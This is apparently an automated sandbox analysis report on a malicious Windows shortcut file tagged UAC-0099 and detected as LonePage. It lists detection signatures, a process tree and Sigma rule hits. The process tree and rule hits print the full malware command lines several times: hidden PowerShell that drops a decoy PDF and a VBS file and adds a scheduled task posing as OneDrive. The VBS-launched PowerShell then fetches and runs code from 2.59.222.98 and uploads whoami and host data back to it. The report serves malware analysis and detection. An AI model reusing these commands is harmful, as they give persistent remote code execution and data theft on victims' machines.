
Windows Analysis Report
140AEcuVy7.lnk

Overview

General Information

Sample name: 140AEcuVy7.lnk (renamed because original name is a hash value)
Original sample name: 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51.lnk
Analysis ID: 1522697
MD5: 64752d058e5829210a0f407fb912c9d3
SHA1: 4e8a0cfb784a6f93f8974b4f11679786cef86bb7
SHA256: 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51
Tags: lnk, UAC-0099, user-JAMESWT_MHT

Detection

LonePage
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\document.pdf -value $fil -encoding byte;&$home\appdata\local\temp\document.pdf;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3RhcnQtc2xlZXAgKGdldC1yYW5kb20gLW1pbiA1IC1tYXggNDMpO3N0YXJ0LXNsZWVwIDExOyRpaWs9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRmbG09JGlpay5kb3dubG9hZGRhdGEoJ2h0dHA6Ly8yLjU5LjIyMi45ODo0MzgyMC9LZm5nbkhieEZIamF1Y2llL3BhZ2UxMDcvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskaGJuPUlFWCAkamtyOyRiamRvKz0kaGJufE91dC1zdHJpbmc7W2J5dGVbXV0kZHJweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiamRvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLzIuNTkuMjIyLjk4OjI4NDAyL3BhZ2UxMDcnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Recorded.vbs -value $c;schtasks.exe /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Acrobat.exe (PID: 2940 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7452 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7672 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1728,i,12702411498753033684,7387674129069318371,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • schtasks.exe (PID: 6596 cmdline: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 7272 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 4796 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\Recorded.vbs | JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
Source | Rule | Description | Author | Strings
00000010.00000002.4545241066.00000107F6460000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
0000000F.00000002.4358131758.00000245D7680000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
0000000F.00000002.4358131758.00000245D7686000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
0000000F.00000002.4358131758.00000245D76C5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
00000006.00000002.3475796002.000001DE79AE7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
(20 entries in total)

              System Summary

              Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , ProcessId: 7272, ProcessName: wscript.exe
              Source: File created; Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6496, TargetFilename: C:\Users\Public\Libraries\Recorded.vbs
              Source: Process started; Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6496, TargetFilename: C:\Users\Public\Libraries\Recorded.vbs
              Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, ProcessId: 7332, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, ProcessId: 7332, ProcessName: powershell.exe
              Source: Process started; Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , ProcessId: 7272, ProcessName: wscript.exe
              Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: Process started; Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7528, ProcessName: svchost.exe
              No Suricata rule has matched

              AV Detection

              Source: 140AEcuVy7.lnk; ReversingLabs: Detection: 52%
              Source: Submitted Sample; Integrated Neural Analysis Model: Matched 97.4% probability
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\Z:\syscalls\amsi64_7332.amsi.csve.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79727000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3415629273.000001DE5F8CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdb;+O source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbo1 source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
